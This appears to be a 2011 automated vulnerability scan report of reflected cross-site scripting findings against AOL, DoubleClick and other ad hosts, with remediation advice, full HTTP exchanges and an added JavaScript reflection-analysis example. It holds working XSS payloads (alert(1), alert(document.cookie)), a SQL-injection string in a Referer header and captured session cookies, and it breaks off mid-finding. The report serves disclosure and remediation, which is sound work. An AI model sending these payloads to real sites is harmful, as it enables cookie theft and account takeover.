Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3015e"%3bc03e6044435 was submitted in the REST URL parameter 1. This input was echoed as 3015e";c03e6044435 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork3015e"%3bc03e6044435/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.3021032781.3908175104; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm02.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork3015e";c03e6044435";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b307b"%3b18c402aedf2 was submitted in the REST URL parameter 1. This input was echoed as b307b";18c402aedf2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkb307b"%3b18c402aedf2/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.360777472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkb307b";18c402aedf2";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d7d"%3b33da55b5274 was submitted in the REST URL parameter 1. This input was echoed as a6d7d";33da55b5274 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworka6d7d"%3b33da55b5274/mem_tos HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3773433344; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10537
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm30.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworka6d7d";33da55b5274";
s_265.prop2="mem_tos";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba4d3"%3b0da027c5667 was submitted in the REST URL parameter 1. This input was echoed as ba4d3";0da027c5667 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkba4d3"%3b0da027c5667/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.528549632; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkba4d3";0da027c5667";
s_265.prop2="trademarks";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2cb1"%3b0c58d64b746 was submitted in the REST URL parameter 1. This input was echoed as b2cb1";0c58d64b746 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemapb2cb1"%3b0c58d64b746/ HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
Referer: http://latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video?110145548'%20or%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.1132070656; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:12:18 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Cteonnt-Length: 10499
Connection: close
Content-Length: 10499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="sitemapb2cb1";0c58d64b746";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...
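The five about.aol.com findings above all rest on the same observation: the probe's `"` and `;` came back unencoded inside a double-quoted literal in an inline script. The following added JavaScript (Node) example, which is not part of the scan report, is a simplified version of the reflection analysis a scanner performs before it reports that the string can be terminated. SAMPLE_RESPONSE is constructed to resemble the responses above (one copy of the probe inside the inline script and, for contrast, one HTML-encoded copy in body text that the real pages may not contain); the function names are this example's own.

```javascript
// Added example; SAMPLE_RESPONSE is constructed, not a captured response.
// The probe the report sent, URL-decoded: prefix 3015e, payload ";, suffix c03e6044435.
const PREFIX = '3015e';
const SUFFIX = 'c03e6044435';
const PAYLOAD = '";';

const SAMPLE_RESPONSE = `<html><head><title>abt : Page Not Found</title>
<script type="text/javascript"><!--
s_265.server="acp-lm02.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.prop1="aolnetwork3015e";c03e6044435";
s_265.prop2="aol_pp";
var s_code=s_265.t();
if(s_code)document.write(s_code)
//--></script></head>
<body><p>No page named aolnetwork3015e&quot;;c03e6044435 exists.</p></body></html>`;

// Every place the prefix...suffix pair appears, with whatever the server put in between.
function findReflections(body, prefix, suffix) {
  const hits = [];
  for (let from = 0; ; ) {
    const start = body.indexOf(prefix, from);
    if (start < 0) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end < 0) break;
    hits.push({ index: start + prefix.length, echoed: body.slice(start + prefix.length, end) });
    from = end + suffix.length;
  }
  return hits;
}

// Which of the characters we sent came back unencoded?
function survivingChars(sent, echoed) {
  return [...new Set(sent)].filter(ch => echoed.includes(ch));
}

// Is `index` inside a <script> block, and if so inside an open string literal?
// Deliberately naive: it ignores JS comments, regex literals and template literals,
// which is exactly the kind of obstacle the report tells you to examine by hand.
function scriptContext(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const open = lower.lastIndexOf('<script');
  const close = lower.lastIndexOf('</script');
  if (open < 0 || close > open) return { inScript: false, insideQuote: null };
  const code = before.slice(before.indexOf('>', open) + 1);
  let quote = null;
  for (let i = 0; i < code.length; i++) {
    const ch = code[i];
    if (quote) {
      if (ch === '\\') i++;                 // skip the escaped character
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    }
  }
  return { inScript: true, insideQuote: quote };
}

function classify(body, payload, prefix, suffix) {
  return findReflections(body, prefix, suffix).map(hit => {
    const ctx = scriptContext(body, hit.index);
    const survived = survivingChars(payload, hit.echoed);
    return {
      echoed: hit.echoed,
      survived,
      inScript: ctx.inScript,
      insideQuote: ctx.insideQuote,
      // The report's conclusion: a surviving quote of the enclosing kind ends the literal.
      terminatesString: ctx.inScript && ctx.insideQuote !== null && survived.includes(ctx.insideQuote),
    };
  });
}
```

`classify(SAMPLE_RESPONSE, PAYLOAD, PREFIX, SUFFIX)` returns two results: the script copy is inside a `"` literal with both `"` and `;` surviving, so `terminatesString` is true; the body-text copy came back as `&quot;;`, so only `;` survived and it is harmless there. Terminating the string is necessary but not sufficient for a working exploit, which is why the report still asks for manual follow-up: the characters needed to call something (`(`, `)`, `/`, `<`) may be filtered or length-limited even though `"` is not.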
The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c48dd"%3balert(1)//51cb3eab07a was submitted in the clk1 parameter. This input was echoed as c48dd";alert(1)//51cb3eab07a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=639!?che=7735200&clk1=c48dd"%3balert(1)//51cb3eab07a HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=65385214552746607; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDPwEQAAEAhn53%2FItTDiD8ogAAAAAAAAHiAAAAAAAAAz8AAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:00 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb519"><script>alert(1)</script>9f3b6c26b66 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=639!?che=7735200&clk1=cb519"><script>alert(1)</script>9f3b6c26b66 HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=289089061502008663; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDWQEQAAEAhn4H0B%2BXD6%2FnigAAAAAAAAHiAAAAAAAAA1kAAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe590'%3balert(1)//d0f1bb128f1 was submitted in the kw parameter. This input was echoed as fe590';alert(1)//d0f1bb128f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/article_tools;kw=fe590'%3balert(1)//d0f1bb128f1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 380
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:59:12 GMT
Expires: Sun, 06 Feb 2011 20:59:12 GMT
1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/brokerbutton.smartmoney.com/article_tools
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68712'-alert(1)-'595c492cbdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/article_tools;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;ord=1557503509?&68712'-alert(1)-'595c492cbdb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 20:59:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf18'-alert(1)-'10c9706c898 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:53 GMT; path=/
Set-Cookie: i_1=19:1537:705:23:0:38885:1297024553:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 928
function wsod_image() { document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn ...[SNIP]... eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.705.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" tit ...[SNIP]...
1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d164'-alert(1)-'c88d9c62617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
